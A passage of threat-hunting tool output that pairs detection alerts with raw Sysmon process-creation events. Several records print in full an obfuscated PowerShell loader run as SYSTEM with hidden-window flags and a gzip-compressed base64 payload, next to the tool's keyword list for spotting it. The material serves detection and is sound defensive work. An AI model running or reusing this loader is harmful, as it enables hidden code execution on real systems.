<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
</TimeCreated>
<EventRecordID>9808</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ParentProcessId"">3348</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.286383Z"">
</TimeCreated>
<EventRecordID>4946</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.273</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7318B00</Data>
<Data Name=""ProcessId"">4148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace show status </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.106089Z"">
</TimeCreated>
<EventRecordID>9808</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.965</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 